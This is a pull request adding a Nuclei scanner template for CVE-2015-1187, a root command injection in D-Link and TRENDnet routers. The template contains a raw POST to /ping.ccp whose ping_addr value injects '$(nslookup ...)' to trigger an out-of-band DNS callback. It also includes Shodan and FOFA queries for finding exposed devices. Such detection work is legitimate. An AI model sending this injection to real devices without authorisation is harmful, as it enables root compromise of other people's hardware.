### PR TITLE
Add CVE-2015-1187 - D-Link/TRENDnet NCC Service Command Injection

### DIFF
--- a/http/cves/2015/CVE-2015-1187.yaml
+++ b/http/cves/2015/CVE-2015-1187.yaml
@@ -1,0 +1,56 @@
+id: CVE-2015-1187
+
+info:
+  name: D-Link/TRENDnet NCC Service - Remote Command Injection
+  author: maciejklimek
+  severity: critical
+  description: |
+    The ping tool in multiple D-Link and TRENDnet devices allows remote attackers to execute arbitrary code via the ping_addr parameter to ping.ccp. The ncc2 service's doPingV6 function passes the ping_addr value unsanitized to a system() call, enabling unauthenticated remote command execution as root.
+  impact: |
+    An unauthenticated remote attacker can execute arbitrary operating system commands as root on affected D-Link and TRENDnet devices, leading to full device compromise.
+  remediation: |
+    Update to the latest firmware version for your device. D-Link has released patches for affected models. If no patch is available, restrict access to the device management interface.
+  reference:
+    - https://www.kernelpicnic.net/2015/02/26/D-Link-and-TRENDnet-ncc2-service.html
+    - http://packetstormsecurity.com/files/131465/D-Link-TRENDnet-NCC-Service-Command-Injection.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1187
+    - http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2015-1187
+    cwe-id: CWE-78
+    epss-score: 0.81232
+    epss-percentile: 0.98606
+    cpe: cpe:2.3:o:dlink:dir-626l_firmware:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dlink
+    product: dir-826l_firmware
+    shodan-query: 'http.title:"D-Link" "DIR-8"'
+    fofa-query: 'body="D-Link" && body="DIR-8"'
+  tags: cve,cve2015,dlink,trendnet,rce,oob,kev
+
+http:
+  - raw:
+      - |
+        POST /ping.ccp HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        ccp_act=ping_v6&ping_addr=$(nslookup+{{interactsh-url}})
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "ping"
+          - "ccp"
+        condition: or


### PR DESCRIPTION
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
